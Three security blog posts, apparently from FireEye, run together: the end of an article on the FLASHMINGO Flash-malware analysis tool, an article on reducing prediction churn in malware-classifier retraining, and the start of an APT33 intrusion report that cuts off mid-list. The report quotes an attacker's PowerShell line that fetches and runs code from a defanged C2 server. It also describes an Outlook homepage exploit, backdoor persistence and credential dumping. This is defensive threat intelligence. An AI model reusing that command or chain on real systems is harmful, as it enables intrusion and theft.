  • Find suspicious method names. Many samples contain method names used during development, like “run_shell” or “find_virtualprotect”. This plug-in flags samples with methods containing suspicious substrings.
  • Find suspicious constants. The presence of certain constant values in the bytecode may point to malicious or suspicious code. For example, code containing the constant value 0x5A4D may be shellcode searching for an MZ header.
  • Find suspicious loops. Malicious activity often happens within loops. This includes encoding, decoding, and heap spraying. This plug-in flags methods containing loops with interesting operations such as XOR or bitwise AND. It is a simple heuristic that effectively detects most encoding and decoding operations, and otherwise interesting code to further analyse.
  • Retrieve all embedded binary data.
  • A decompiler plug-in that uses the FFDEC Flash Decompiler. This decompiler engine, written in Java, can be used as a stand-alone library. Since FLASHMINGO is written in Python, using this plug-in requires Jython to interoperate between these two languages.

Extending FLASHMINGO With Your Own Plug-ins

FLASHMINGO is very easy to extend. Every plug-in is located in its own directory under the plug-ins directory. At start-up FLASHMINGO searches all plug-in directories for a manifest file (explained later in the post) and registers the plug-in if it is marked as active.

To accelerate development a template plug-in is provided. To add your own plug-in, copy the template directory, rename it, and edit its manifest and code. The template plug-in’s manifest, written in YAML, is shown below:

```
# This is a template for easy development
name: Template
active: no
description: copy this to kickstart development
returns: nothing

```

The most important parameters in this file are: name and active. The name parameter is used internally by FLASHMINGO to refer to it. The active parameter is a Boolean value (yes or no) indicating whether this plug-in should be active or not. By default, all plug-ins (except the template) are active, but there may be cases where a user would want to deactivate a plug-in. The parameters description and returns are simple strings to display documentation to the user. Finally, plug-in manifests are parsed once at program start. Adding new plug-ins or enabling/disabling plug-ins requires restarting FLASHMINGO.
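To illustrate the registration step, the sketch below walks a plug-ins directory, loads each manifest with PyYAML, and keeps only the plug-ins marked active. The manifest fields match the template above, but the directory layout, manifest filename, and loading mechanics are simplifications rather than FLASHMINGO's actual code.

```
import os
import yaml

def discover_plugins(plugins_dir: str = "plug-ins") -> dict:
    """Return {plugin_name: plugin_dir} for every plug-in whose manifest sets
    'active' to yes/true. Manifests are read once, at start-up."""
    registered = {}
    for entry in os.listdir(plugins_dir):
        plugin_dir = os.path.join(plugins_dir, entry)
        manifest_path = os.path.join(plugin_dir, "manifest.yml")  # assumed filename
        if not os.path.isfile(manifest_path):
            continue
        with open(manifest_path) as f:
            manifest = yaml.safe_load(f)
        if manifest.get("active"):          # YAML parses "yes"/"no" as booleans
            registered[manifest["name"]] = plugin_dir
    return registered

if __name__ == "__main__":
    for name, path in discover_plugins().items():
        print(f"registered plug-in {name!r} from {path}")
```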

Now for the actual code implementing the business logic. The file plugin.py contains a class named Plugin; the only thing that is needed is to implement its run method. Each plug-in receives an instance of a SWFObject as a parameter. The code will interact with this object and return data in a custom format, defined by the user. This way, the user's plug-ins can be written to produce data that can be directly ingested by their infrastructure.

Let's see how easy it is to create plug-ins by walking through one that is included, named binary_data. This plugin returns all embedded data in a SWF file by default. If the user specifies an optional parameter pattern then the plug-in searches for matches of that byte sequence within the embedded data, returning a dictionary of embedded data and the offset at which the pattern was found.

First, the plug-in defines the optional pattern argument to be supplied by the user. It then implements a custom run method, along with any supporting code that method needs.

This is a simple but useful plug-in, and it illustrates how to interact with FLASHMINGO. The plug-in has a logging facility accessible through the property “ml”. By default it logs to FLASHMINGO’s main logger; if unspecified, it falls back to a log file within the plug-in’s directory. The custom run method extracts information from the SWF’s embedded data with the help of a custom _inspect_binary_data method. Note the source of this binary data: it is read from a property named “swf”, which is the SWFObject passed to the plug-in, as mentioned previously. More complex analysis can be performed on the SWF file contents by interacting with this swf object. Our repository contains documentation for all available methods of a SWFObject.
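Because the code figures for this plug-in are not reproduced here, the stripped-down sketch below captures its shape as described: a Plugin class whose run method walks the embedded binary data exposed through the swf property and reports the offset of an optional byte pattern. The attribute and helper names on the SWFObject side are placeholders; consult the repository documentation for the real interface.

```
class Plugin:
    """Sketch of a FLASHMINGO-style plug-in, modeled on binary_data."""

    def __init__(self, swf, pattern=None, ml=None):
        self.swf = swf            # SWFObject handed to the plug-in
        self.pattern = pattern    # optional byte sequence to search for
        self.ml = ml              # logger; FLASHMINGO supplies its main logger

    def run(self):
        results = {}
        # 'binary_data' is a placeholder for however the SWFObject exposes
        # embedded binary blobs (e.g., tag id -> bytes).
        for tag_id, blob in getattr(self.swf, "binary_data", {}).items():
            if self.pattern is None:
                results[tag_id] = blob
            else:
                offset = self._inspect_binary_data(blob)
                if offset != -1:
                    results[tag_id] = offset
        if self.ml:
            self.ml.info("binary_data plug-in found %d result(s)", len(results))
        return results

    def _inspect_binary_data(self, blob):
        """Return the offset of self.pattern within blob, or -1."""
        return blob.find(self.pattern)
```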

Conclusion

Even though Flash is set to reach its end of life at the end of 2020 and most of the development community has moved away from it a long time ago, we predict that we’ll see Flash being used as an infection vector for a while. Legacy technologies are juicy targets for attackers due to the lack of security updates. FLASHMINGO provides malware analysts a flexible framework to quickly deal with these pesky Flash samples without getting bogged down in the intricacies of the execution environment and file format.

Find the FLASHMINGO tool on the FireEye public GitHub Repository.

Churning Out Machine Learning Models: Handling Changes in Model Predictions

Introduction

Machine learning (ML) is playing an increasingly important role in cyber security. Here at FireEye, we employ ML for a variety of tasks such as: antivirus, malicious PowerShell detection, and correlating threat actor behavior. While many people think that a data scientist’s job is finished when a model is built, the truth is that cyber threats constantly change and so must our models. The initial training is only the start of the process and ML model maintenance creates a large amount of technical debt. Google provides a helpful introduction to this topic in their paper “Machine Learning: The High-Interest Credit Card of Technical Debt.” A key concept from the paper is the principle of CACE: change anything, change everything. Because ML models deliberately find nonlinear dependencies between input data, small changes in our data can create cascading effects on model accuracy and downstream systems that consume those model predictions. This creates an inherent conflict in cyber security modeling: (1) we need to update models over time to adjust to current threats and (2) changing models can lead to unpredictable outcomes that we need to mitigate.

Ideally, when we update a model, the only changes in model outputs are improvements, e.g. fixes to previous errors. Both false negatives (missing malicious activity) and false positives (alerts on benign activity) have significant impact and should be minimized. Since no ML model is perfect, we mitigate mistakes with orthogonal approaches: whitelists and blacklists, external intelligence feeds, rule-based systems, etc. Combining model output with other information also provides context for alerts that may not otherwise be present. However, CACE! These integrated systems can suffer unintended side effects from a model update. Even when the overall model accuracy has increased, individual changes in model output are not guaranteed to be improvements. Introduction of new false negatives or false positives in an updated model, called churn, creates the potential for new vulnerabilities and negative interactions with cyber security infrastructure that consumes model output. In this article, we discuss churn, how it creates technical debt when considering the larger cyber security product, and methods to reduce it.

Prediction Churn

Whenever we retrain our cyber security-focused ML models, we need to be able to calculate and control for churn. Formally, prediction churn is defined as the expected percent difference between two different model predictions (note that prediction churn is not the same as customer churn, the loss of customers over time, which is the more common usage of the term in business analytics). It was originally defined by Cormier et al. for a variety of applications. For cyber security applications, we are often concerned with just those differences where the newer model performs worse than the older model. Let’s define bad churn when retraining a classifier as the percentage of misclassified samples in the test set which the original model correctly classified.
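As a concrete illustration of that definition, the snippet below computes bad churn from the test labels and the two models' predictions (the array names are ours):

```
import numpy as np

def bad_churn(y_true, y_old, y_new):
    """Fraction of test samples the new model gets wrong
    that the old model classified correctly."""
    y_true, y_old, y_new = map(np.asarray, (y_true, y_old, y_new))
    newly_wrong = (y_new != y_true) & (y_old == y_true)
    return newly_wrong.mean()

# Toy example: 1 of 5 samples is newly misclassified -> 20% bad churn.
y_true = [0, 1, 1, 0, 1]
y_old  = [0, 1, 0, 0, 1]
y_new  = [0, 1, 1, 0, 0]
print(f"bad churn: {bad_churn(y_true, y_old, y_new):.1%}")
```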

Churn is often a surprising and non-intuitive concept. After all, if the accuracy of our new model is better than the accuracy of our old model, what’s the problem? Consider the simple linear classification problem of malicious red squares and benign blue circles in Figure 1. The original model, A, makes three misclassifications while the newer model, B, makes only two errors. B is the more accurate model. Note, however, that B introduces a new mistake in the lower right corner, misclassifying a red square as benign. That square was correctly classified by model A and represents an instance of bad churn. Clearly, it’s possible to reduce the overall error rate while introducing a small number of new errors which did not exist in the older model.


Figure 1: Two linear classifiers with errors highlighted in orange. The original classifier A has lower accuracy than B. However, B introduces a new error in the bottom right corner.

Practically, churn introduces two problems in our models. First, bad churn may require changes to whitelist/blacklists used in conjunction with ML models. As we previously discussed, these are used to handle the small but inevitable number of incorrect classifications. Testing on large repositories of data is necessary to catch such changes and update associated whitelists and blacklists. Second, churn may create issues for other ML models or rule-based systems which rely on the output of the ML model. For example, consider a hypothetical system which evaluates URLs using both a ML model and a noisy blacklist. The system generates an alert if

  • P(URL = ‘malicious’) > 0.9 or
  • P(URL = ‘malicious’) > 0.5 and the URL is on the blacklist

After retraining, the distribution of P(URL=‘malicious’) changes and all .com domains receive a higher score. The alert rules may need to be readjusted to maintain the required overall accuracy of the combined system. Ultimately, finding ways of reducing churn minimizes this kind of technical debt.
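A sketch of that hypothetical alerting logic makes the fragility clear: both thresholds are tuned against a particular score distribution, so a retrain that shifts P(URL = ‘malicious’) forces the thresholds, or the blacklist, to be revisited.

```
def should_alert(p_malicious: float, url: str, blacklist: set) -> bool:
    # Rule 1: high-confidence model score alone.
    if p_malicious > 0.9:
        return True
    # Rule 2: medium score corroborated by the (noisy) blacklist.
    return p_malicious > 0.5 and url in blacklist

blacklist = {"bad.example.com"}
print(should_alert(0.55, "bad.example.com", blacklist))   # True
print(should_alert(0.55, "new.example.com", blacklist))   # False today; after a
# retrain that inflates .com scores, many such URLs may cross 0.5 (or 0.9)
# and the thresholds will need re-tuning.
```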

Experimental Setup

We’re going to explore churn and churn reduction techniques using EMBER, an open source malware classification data set. It consists of 1.1 million PE files first seen in 2017, along with their labels and features. The objective is to classify the files as either goodware or malware. For our purposes we need to construct not one model, but two, in order to calculate the churn between models. We have split the data set into three pieces:

  1. January through August is used as training data
  2. September and October are used to simulate running the model in production and retraining (test 1 in Figure 2).
  3. November and December are used to evaluate the models from step 1 and 2 (test 2 in Figure 2).


Figure 2: A comparison of our experimental setup versus the original EMBER data split. EMBER has a ten-month training set and a two-month test set. Our setup splits the data into three sets to simulate model training, then retraining while keeping an independent data set for final evaluation.

Figure 2 shows our data split and how it compares to the original EMBER data split. We have built a LightGBM classifier on the training data, which we’ll refer to as the baseline model. To simulate production testing, we run the baseline model on test 1 and record the FPs and FNs. Then, we retrain our model using both the training data and the FPs/FNs from test 1. We’ll refer to this model as the standard retrain. This is a reasonably realistic simulation of actual production data collection and model retraining. Finally, both the baseline model and the standard retrain are evaluated on test 2. The standard retrain has a higher accuracy than the baseline on test 2, 99.33% vs 99.10% respectively. However, there are 246 misclassifications made by the retrain model that were not made by the baseline or 0.12% bad churn.

Incremental Learning

Since our rationale for retraining is that cyber security threats change over time, e.g. concept drift, it’s a natural suggestion to use techniques like incremental learning to handle retraining. In incremental learning we take new data to learn new concepts without forgetting (all) previously learned concepts. That also suggests that an incrementally trained model may not have as much churn, as the concepts learned in the baseline model still exist in the new model. Not all ML models support incremental learning, but linear and logistic regression, neural networks, and some decision trees do. Other ML models can be modified to implement incremental learning. For our experiment, we incrementally trained the baseline LightGBM model by augmenting the training data with FPs and FNs from test 1 and then trained an additional 100 trees on top of the baseline model (for a total of 1,100 trees). Unlike the baseline model we use regularization (L2 parameter of 1.0); using no regularization resulted in overfitting to the new points. The incremental model has a bad churn of 0.05% (113 samples total) and 99.34% accuracy on test 2. Another interesting metric is the model’s performance on the new training data; how many of the baseline FPs and FNs from test 1 does the new model fix? The incrementally trained model correctly classifies 84% of the previous incorrect classifications. In a very broad sense, incrementally training on a previous model’s mistake provides a “patch” for the “bugs” of the old model.
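A minimal sketch of this kind of incremental retrain with LightGBM follows; the feature arrays are placeholders standing in for the EMBER features, and the parameter choices are illustrative rather than the exact configuration used in our experiment.

```
import lightgbm as lgb
import numpy as np

# Placeholder arrays standing in for EMBER-style feature matrices and labels.
X_train, y_train = np.load("X_train.npy"), np.load("y_train.npy")
X_errors, y_errors = np.load("X_errors.npy"), np.load("y_errors.npy")  # FPs/FNs from test 1

base_params = {"objective": "binary"}
inc_params = {"objective": "binary", "lambda_l2": 1.0}  # regularization only for the incremental step

# Baseline: 1,000 trees on the original training data.
baseline = lgb.train(base_params, lgb.Dataset(X_train, y_train), num_boost_round=1000)

# Incremental model: 100 additional trees, continuing from the baseline,
# trained on the original data augmented with the baseline's mistakes.
augmented = lgb.Dataset(np.vstack([X_train, X_errors]),
                        np.concatenate([y_train, y_errors]))
incremental = lgb.train(inc_params, augmented, num_boost_round=100,
                        init_model=baseline)
```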

Churn-Aware Learning

Incremental approaches only work if the features of the original and new model are identical. If new features are added, say to improve model accuracy, then alternative methods are required. If what we desire is both accuracy and low churn, then the most straightforward solution is to include both of these requirements when training. That’s the approach taken by Cormier et al., where samples received different weights during training in such a way as to minimize churn. We have made a few deviations in our approach: (1) we are interested in reducing bad churn (churn involving new misclassifications) as opposed to all churn and (2) we would like to avoid the extreme memory requirements of the original method. In a similar manner to Cormier et al., we want to reduce the weight, e.g. importance, of previously misclassified samples during training of a new model. Practically, the model sees making the same mistakes as the previous model as cheaper than making a new mistake. Our weighting scheme gives all samples correctly classified by the original model a weight of one; all other samples receive a weight of w = α − β·|0.5 − P_old(x_i)|, where P_old(x_i) is the output of the old model on sample x_i, and α and β are adjustable hyperparameters. We train this reduced churn operator model (RCOP) using an α of 0.9, a β of 0.6, and the same training data as the incremental model. RCOP produces 0.09% bad churn and 99.38% accuracy on test 2.
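The weighting itself is only a few lines. The sketch below continues the placeholder setup from the incremental-learning example (hypothetical array names, α = 0.9, β = 0.6) and passes the weights to LightGBM through the Dataset's weight parameter:

```
import numpy as np
import lightgbm as lgb

# Continues the placeholder setup above: 'baseline' is the 1,000-tree baseline
# booster, and X_all / y_all are the training data augmented with the
# baseline's FPs/FNs from test 1.
X_all = np.vstack([X_train, X_errors])
y_all = np.concatenate([y_train, y_errors])

alpha, beta = 0.9, 0.6

p_old = baseline.predict(X_all)                     # old model's probability of "malware"
old_wrong = (p_old > 0.5).astype(int) != y_all      # samples the baseline misclassified

# Correctly classified samples keep weight 1; samples the old model got wrong are
# down-weighted, and more so the more confident the old model was in its mistake.
weights = np.ones(len(y_all))
weights[old_wrong] = alpha - beta * np.abs(0.5 - p_old[old_wrong])

rcop = lgb.train({"objective": "binary"},
                 lgb.Dataset(X_all, y_all, weight=weights),
                 num_boost_round=1100)
```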

Results

Figure 3 shows both accuracy and bad churn of each model on test set 2. We compare the baseline model, the standard model retrain, the incrementally learned model and the RCOP model.


Figure 3: Bad churn versus accuracy on test set 2.

Table 1 summarizes each of these approaches, discussed in detail above.

Name | Trained on | Method | Total # of trees
Baseline | train | LightGBM | 1000
Standard retrain | train + FPs/FNs from baseline on test 1 | LightGBM | 1100
Incremental model | train + FPs/FNs from baseline on test 1 | Trained 100 new trees, starting from the baseline model | 1100
RCOP | train + FPs/FNs from baseline on test 1 | LightGBM with altered sample weights | 1100

Table 1: A description of the models tested

The baseline model has 100 fewer trees than the other models, which could explain its comparatively lower accuracy. However, increasing the number of trees resulted in only a minor accuracy gain of less than 0.001%, so the increase in accuracy for the non-baseline methods is due to the differences in data set and training method. Both incremental training and RCOP work as expected, producing less churn than the standard retrain while showing accuracy improvements over the baseline. In general, increasing accuracy tends to be correlated with increasing bad churn: there is no free lunch. The increased accuracy comes from changes to the decision boundary, and the more the model improves, the more the boundary changes. It seems reasonable that these decision boundary changes correlate with an increase in bad churn, although we see no theoretical justification for why that must always be the case.

Unexpectedly, both the incremental model and RCOP produce more accurate models with less churn than the standard retrain. We would have assumed that given their additional constraints both models would have less accuracy with less churn. The most direct comparison is RCOP versus the standard retrain. Both models use identical data sets and model parameters, varying only by the weights associated with each sample. RCOP reduces the weight of incorrectly classified samples by the baseline model. That reduction is responsible for the improvement in accuracy. A possible explanation of this behavior is mislabeled training data. Multiple authors have suggested identifying and removing points with label noise, often using the misclassifications of a previously trained model to identify those noisy points. Our scheme, which reduces the weight of those points instead of removing them, is not dissimilar to those other noise reduction approaches which could explain the accuracy improvement.

Conclusion

ML models experience an inherent struggle: not retraining means being vulnerable to new classes of threats, while retraining causes churn and potentially reintroduces old vulnerabilities. In this blog post, we have discussed two different approaches to modifying ML model training in order to reduce churn: incremental model training and churn-aware learning. Both demonstrate effectiveness in the EMBER malware classification data set by reducing the bad churn, while simultaneously improving accuracy. Finally, we also demonstrated the novel conclusion that reducing churn in a data set with label noise can result in a more accurate model. Overall, these approaches provide low technical debt solutions to updating models that allow data scientists and machine learning engineers to keep their models up-to-date against the latest cyber threats at minimal cost. At FireEye, our data scientists work closely with the FireEye Labs detection analysts to quickly identify misclassifications and use these techniques to reduce the impact of churn on our customers.

OVERRULED: Containing a Potentially Destructive Adversary

Introduction

FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.

On Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity targeting Energy and Aerospace industries. Recent public reporting indicated possible links between the confirmed APT33 spear phishing and destructive SHAMOON attacks; however, we were unable to independently verify this claim. FireEye’s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.

Identifying the Overlap in Threat Activity

FireEye augments our expertise with an internally-developed similarity engine to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection during specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is available within our intelligence portal. To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during their 24x7 monitoring.

Managed Defense Rapid Responses: Investigating the Attacker

In mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost’s RULER, to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\outlook\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f).

The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system’s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.

FireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor’s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.

In mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER’s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users’ Outlook client homepages for code execution and persistence. These methods are further explored in this post in the "RULER In-The-Wild" section.

The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.

During the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.


Figure 1: Attacker’s homepage exploit (CVE-2017-11774)

The main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named “Media.ps1” within the user’s %LOCALAPPDATA% directory (%LOCALAPPDATA%\MediaWs\Media.ps1) as shown in Figure 2.


Figure 2: Attacker’s “Media.ps1” script

The purpose of “Media.ps1” was to decode and execute the downloaded binary payload, which was written to disk as “C:\Users\Public\Downloads\log.dat”. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.

Analysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:

  • Username and domain
  • Computer name
  • CPU details
  • Current exe PID
  • Configured C2 server

The C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned “Media.ps1” PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.

POSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info). The adversary had limited success interacting with POWERTON during this time. The actor was able to download and establish persistence for an AutoIt binary named “ClouldPackage.exe” (MD5: 46038aa5b21b940099b0db413fa62687) via the POWERTON “persist” command. The sole functionality of “ClouldPackage.exe” was to execute the following line of PowerShell code:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')

The purpose of this code is to retrieve “silent mode” POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.

Starting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They made some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection. The actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of “index.html” were identified during this period. Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.


Figure 3: OS-specific POSHC2 Downloader

Figure 3 shows that the actor made some minor changes, such as encoding the PowerShell "DownloadString" commands and renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download the POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file dropped to decode and execute the POSHC2 variant also changed to “Vision.ps1”. During this August 2018 activity, the POSHC2 variants were configured with a “kill date” of Aug. 13, 2018. Note that kill date functionality is built into the POSHC2 framework in order to guardrail an intrusion by time.

Once again, POSHC2 was used to download a new variant of POWERTON (MD5: c38069d0bc79acdc28af3820c1123e53), configured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed.

Due to Managed Defense’s early containment of these intrusions, we were unable to ascertain the actor’s motivations; however, it was clear they were adamant about gaining and maintaining access to the victim’s network.

Adversary Pursuit: Infrastructure Monitoring

Advanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at scale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16 and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5: 8be06571e915ae3f76901d52068e3498) to download and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info (MD5: 4047e238bbcec147f8b97d849ef40ce5). This specific URL was identified in a public discussion as possibly related to recent destructive attacks. We are unable to independently verify this correlation with any organic information we possess.

On Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5: f0fe6e9dde998907af76d91ba8f68a05). The payload was crafted to download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: 53ae59ed03fa5df3bf738bc0775a91d9).

Table 1 contains the operational timeline for the activity we analyzed.

DATE/TIME (UTC) | NOTE | INDICATOR
2017-08-15 17:06:59 | APT33 – EMPIRE (Used) | 8a99624d224ab3378598b9895660c890
2017-09-15 16:49:59 | APT33 – PUPYRAT (Compiled) | 4b19bccc25750f49c2c1bb462509f84e
2017-11-12 20:42:43 | GroupA – AUT2EXE Downloader (Compiled) | 95f3bea43338addc1ad951cd2d42eb6f
2017-11-14 14:55:14 | GroupA – PUPYRAT (Used) | 17587668ac577fce0b278420b8eb72ac
2018-01-09 19:15:16 | APT33 – PUPYRAT (Compiled) | 56f5891f065494fdbb2693cfc9bce9ae
2018-02-13 13:35:06 | APT33 – PUPYRAT (Used) | 56f5891f065494fdbb2693cfc9bce9ae
2018-05-09 18:28:43 | GroupB – AUT2EXE (Compiled) | 46038aa5b21b940099b0db413fa62687
2018-07-02 07:57:40 | APT33 – POSHC2 (Used) | fa7790abe9ee40556fb3c5524388de0b
2018-07-16 00:33:01 | GroupB – POSHC2 (Compiled) | 75e680d5fddbdb989812c7ba83e7c425
2018-07-16 01:39:58 | GroupB – POSHC2 (Used) | 75e680d5fddbdb989812c7ba83e7c425
2018-07-16 08:36:13 | GroupB – POWERTON (Used) | 46038aa5b21b940099b0db413fa62687
2018-07-31 22:09:25 | APT33 – POSHC2 (Used) | 129c296c363b6d9da0102aa03878ca7f
2018-08-06 16:27:05 | GroupB – POSHC2 (Compiled) | fca0ad319bf8e63431eb468603d50eff
2018-08-07 05:10:05 | GroupB – POSHC2 (Used) | 75e680d5fddbdb989812c7ba83e7c425
2018-08-29 18:14:18 | APT33 – POSHC2 (Used) | 5832f708fd860c88cbdc088acecec4ea
2018-10-09 16:02:55 | APT33 – POSHC2 (Used) | 8d3fe1973183e1d3b0dbec31be8ee9dd
2018-10-09 16:48:09 | APT33 – POSHC2 (Used) | 48d1ed9870ed40c224e50a11bf3523f8
2018-10-11 21:29:22 | GroupB – POWERTON (Used) | 8be06571e915ae3f76901d52068e3498
2018-12-13 11:00:00 | GroupB – POWERTON (Identified) | 99649d58c0d502b2dfada02124b1504c

Table 1: Operational Timeline

Outlook and Implications

If the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.

We will continue to track these clusters independently until we achieve high confidence that they are the same. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.

Custom Backdoor: POWERTON

POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI and an auto-run registry key. Communications with the C2 occur over TCP/HTTP(S) and leverage AES encryption for traffic to and from the C2. POWERTON is typically deployed as a later-stage backdoor and is obfuscated with several layers of obfuscation.

FireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.

Table 2 contains samples of POWERTON.

Hash of Obfuscated File (MD5) | Hash of Deobfuscated File (MD5) | Version
974b999186ff434bee3ab6d61411731f | 3871aac486ba79215f2155f32d581dc2 | V1
e2d60bb6e3e67591e13b6a8178d89736 | 2cd286711151efb61a15e2e11736d7d2 | V1
bd80fcf5e70a0677ba94b3f7c011440e | 5a66480e100d4f14e12fceb60e91371d | V1
4047e238bbcec147f8b97d849ef40ce5 | f5ac89d406e698e169ba34fea59a780e | V2
c38069d0bc79acdc28af3820c1123e53 | 4aca006b9afe85b1f11314b39ee270f7 | V2
N/A | 7f4f7e307a11f121d8659ca98bc8ba56 | V2
53ae59ed03fa5df3bf738bc0775a91d9 | 99649d58c0d502b2dfada02124b1504c | V2

Table 2: POWERTON malware samples

Adversary Methods: Email Exploitation on the Rise

Outlook and Exchange are nearly synonymous with email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose email server access to the public internet for their users, those systems become intrusion vectors. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office 365. Our Mandiant consultants also presented several new methods used by adversaries to subvert multifactor authentication at the FireEye Cyber Defense Summit 2018.

At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.

An adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:

  • Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name (and an affiliated password) compromised in a third-party breach somewhere. Did they re-use that password?
